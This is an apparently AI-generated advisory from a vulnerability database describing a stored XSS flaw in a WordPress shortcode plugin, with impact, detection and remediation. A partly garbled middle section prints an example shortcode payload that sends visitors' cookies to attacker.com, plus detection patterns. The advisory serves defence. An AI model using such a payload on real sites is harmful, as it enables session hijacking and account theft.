
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-4077 is a Stored Cross-Site Scripting (XSS) vulnerability in the Ecover Builder For Dummies plugin for WordPress. It affects all versions up to and including 1.0, and was published on March 21, 2026. The flaw allows authenticated attackers with Contributor-level access or above to inject arbitrary web scripts via the unsanitized id parameter of the ecover shortcode. It carries a CVSS v3.1 base score of 6.4 (Medium) (Red Hat CVE, Wordfence).
The root cause is insufficient input sanitization and output escaping on the user-supplied id attribute of the ecover shortcode, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). The vulnerable code is located in plugin_builder.php at lines 39, 44, and 58, where the id parameter is rendered into page output without proper escaping. An attacker with at least Contributor-level WordPress access can embed a malicious shortcode containing a JavaScript payload into a post or page; the script executes in the browser of any user who subsequently visits that page. No special configuration is required beyond having the plugin active and possessing content-editing privileges (Wordfence, WordPress Trac).
Successful exploitation allows an authenticated attacker to persistently inject malicious JavaScript into WordPress pages, which executes in the context of any visitor's browser — including administrators. This can lead to session cookie theft, credential harvesting, defacement, redirection to malicious sites, or further compromise of the WordPress site if an administrator account is hijacked. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is not directly affected (Red Hat CVE, Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-4077 as of the available data. The EPSS score is approximately 0.036%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a Contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, Red Hat CVE).
ecover shortcode can be inserted.[ecover id="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"] into the post content, exploiting the unsanitized id parameter.wp-admin/post.php or the REST API from Contributor-level accounts containing ecover shortcode content with script tags or encoded JavaScript payloads.wp_posts table entries containing [ecover id="<script or similar XSS patterns within post content.ecover shortcode.ecover-builder-for-dummies plugin directory at version 1.0 or below (wp-content/plugins/ecover-builder-for-dummies/) on the WordPress installation (Wordfence).The primary remediation is to update the Ecover Builder For Dummies plugin beyond version 1.0 if a patched release becomes available; as of the disclosure date, patch status was listed as unknown. In the interim, site administrators should disable or remove the plugin entirely to eliminate the attack surface. Additionally, restricting Contributor-level user registrations and auditing existing Contributor accounts for unauthorized content can reduce risk. WordPress administrators should also consider deploying a Web Application Firewall (WAF) with XSS filtering rules as a compensating control (Wordfence, Red Hat CVE).
The vulnerability was discovered and reported by Wordfence, which assigned the CVE and published the advisory. Coverage has been limited to automated vulnerability aggregators and security feed services, with no notable researcher commentary or significant social media discussion identified beyond standard CVE tracking (Wordfence).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."